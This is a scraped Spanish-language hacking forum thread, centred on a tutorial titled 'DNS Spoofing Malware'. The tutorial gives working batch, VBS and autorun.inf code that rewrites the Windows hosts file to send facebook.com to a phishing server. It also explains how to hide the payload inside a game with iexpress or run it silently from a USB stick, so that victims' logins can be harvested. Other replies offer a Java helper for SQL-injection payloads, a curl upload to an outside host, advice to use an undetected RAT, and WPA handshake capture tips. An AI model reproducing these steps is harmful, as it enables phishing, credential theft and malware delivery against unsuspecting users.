Chicos Veo q el tema se esta desviando por favor Peleas fuera del foro, o me vere Obligado a cerrar el tema.

Ya que estamos a full con los XSS aporto mi granito de arena.

Aca les traigo una pequeña herramienta, se q no va en esta seccion, pero la hice con la idea de poder, ayudar en las SQLI, en el momento de convertir el nombre de la tabla a Ascii para lograr la Inyeccion. table_name=char()--

package codificar;
import javax.swing.JOptionPane;

public class Codificar {

    public static void main(String[] args) {
        String Texto = JOptionPane.showInputDialog("Ingrese Texto a Encriptar: ");
        char Letras[] = new char [Texto.length()];
        int Ascii[] = new int [Texto.length()];
        for (int i = 0; i < Texto.length(); i++) {
            Letras[i] = Texto.charAt(i);
            Ascii[i] = (int)Letras[i];
            System.out.print(Ascii[i]+ " ,");
            
        }
        
    }
}

Muy Bueno! Muy Bien explicado!

Buen Aporte! esta bueno que se toque el tema de Metasploit por lo q es, desde q salio Armitage muchos se olvidan de las bases

Buen Aporte!

Yo lo hice con curl

curl -F 'a=a' http://q3rv0.bshellz.net/1fmdI.jpg >> a.jpg  

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Sigue sin funcionar, hizo el ejemplo que dijiste con ip local, pero ni asi funciona, ya lo probe con win 7 y tampoco..


..Saludos espero tu respuesta --->

Fijate luego de modificar el archivo host, en reiniciar la pc y matar el proceso explorer.exe y volverlo a ejecutar

Jaaa!!! no me pase estaba buscando en el final y pase por alto el principio del hexa! muy bueno!

Buena tool, aunq yo recomiendo un buen RAT con el server FUD y que se ejecute con un autorun!

No te fies de los programas, no siempre funcionan, entende como funciona, intenta hacerlo a mano y despues codea tu tool o busca algo q se adapte a tus necesidades, los programas q funcionan porq funcionan no siempre funcionan primero entiende, estudia, domina y luego aplica y vete si quieres para el lado de las tool

Lee sobre Dns Spoof y Dns Poison ahi bastante materian el el foro usa el buscador

Primero define q contraseña tiene el Modem/router al q intentas conectarte ya sea WEP WPA WPA2, fijate con la suite Aircrack, espero q tengas una antena con rtl8117l o con algun chipset como atheros q sea soportado por aircrack, si posees todo esto, dependiendo de la encriptacion de la contraseña, el ataque, si es WPA deberas Denegar el Servicio para q el administrador al reconectarce deje colgado el hash

Lo unico q creo posible hacer desde un Router, es cambiar los dns a un proxy y atrapar toda informacion saliente, Man In The Middle, porq para hacer un ataque con metasploit en una red local, no es necesario tener acceso al router (y para un troyano en un uso local tampoco el filtrado de puertos es para la interaccion entre LAN - WAN).

Accediste al Router de tu red Local, o a un Roter de Red Externa???

Buen Aporte!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Excelente tutorial, lo tratare de hacer haber si me funciona..

No me funciona a la hora de redireccionar,!!!
ya vi el archivo host y la esta cambiado pero no redirecciona, ¿que puede ser?
uso win xp, y firefox i IE

...Saludos --->

Tal ves tu problema radique en esta linea del .bat

echo 190.169.22.51 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login >> %SystemRoot%\system32\drivers\etc\hosts

el IP debe ser de un Servidor Privado Propio, o uno personal montado con un IP Estatica, si no cuentas con esto, prueba redireccionar a una IP LOCAL

q el archivo localhost quede:

127.0.0.1 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

esto lograra q al visitar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login se redireccione a 127.0.0.1

sino otra prueba q puedes hacer es cambiar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login por el ip de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

hosts:

66.220.149.11 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

al visitar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login seras redireccionado a facebook

DNS Spoofing Malware

Bueno en este Tutorial Vamos a ver como realizar un DnsSpoof
atraves del Malware, Modificando el archivo Hosts, y redireccionando
una web a la ip que nosotros deseemos, veremos tambien como ejecutar
este malware desde un una Memoria Flash

El ataque DnsSpoof en el q nos basaremos sera el que modifica el archivo hosts
para eso crearemos un Malware q constara de 2 archivos en un caso y 4 en otro

Primer Caso:

Ingenieria Social.

Crearemos un malware q constara de 2 archivos
un batch q tendra el siguiente codigo (se guardara con la extencion .bat)

@echo off
echo "IP a la q sera redireccionado" "Sitio que redireccionaremos" >> %SystemRoot%\System32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit

En mi caso direccionare You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a un sitio Fake (Phishing)

DNSSPOOF.bat:

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit

Ahora Uniremos este Archivo con por Ejempo un juego portable de bajo peso,
yo elegi Packman.



Para realizar este proceso utilizaremos iexpress:
(No explicare como Funciona ahi mucha Info en Internet)

Agregamos los 2 Archivos:



aca la parte importante.


Install Program: Pondremos Packman.exe

Post Intall Command: Pondremos DNSSPOOF.bat



En Show Windows ponemos Hidden

En Packege Name and Options marcamos la Opcion Hide file Extracting Progress Animation from User

y lo Guardamos con el Nombre Packman2.exe

En Configure Restart ponemos NO RESTART

Esperamos q Termine la Comprecion

Cambiamos el Icono con ResHacker al q creamos combeniente (en este ejemplo no cambiare el icono)



Ahora ejecutamos para la prueba:



vemos que el juego se ejecuta correctamente, vamos al archivo hosts para ver si funciono.



borramos esta ultima linea porq obviamente nosotros no queremos ser las victimas

Ahora no queda mas q usar algo de Ingenieria Social para q la victima Descarge el Archivo y lo ejecute.

Segundo caso:

Ejecutando Archivo desde un PenDrive:

crearemos un archivo autorun.inf que contenga:

[autorun] 

action=Open Files On Folder
icon=USB.ico

shellexecute=Start.vbs

y un Start.vbs que contenga:

set objshell = createobject("wscript.shell")
objshell.run "DNSSPOOF.bat",vbhide

Colocamos DNSSPOOF.bat, Start.vbs, algun .ico q nos guste y el autorun.inf en el PenDrive



Listo Ahora al Conectar el PenDrive Automaticamente se Ejecutara Start.vbs, q a su ves Ejectura DNSSPOOF.bat y cambiara el archivo hosts

Veamos como funciona:

Visitamos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login luego de ejecutar el Malware en la PC Victima (ya sea por cualquiera de los 2 Casos)
y vemos q nos manda a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (que realmente es un sitio Phishing)
Agregamos de Informacion User: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login pass: Owned



y le damos Entrar, nos redirecciona a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (sitio real de facebook)

vamos a nuestro servidor y revisamos el archivo log.txt



Espero Que Este Tutorial les sea de Ayuda, no me hago responsable por el uso que le puedan dar HD_Breaker

Usa NMAP y la ip publica, o host de la pc, si esta filtrado es porq por mas q este abierto el puerto existe un firewall "viendo" que pasa por el

Muy buen aporte! Gracias!

Buen Aporte sigue así!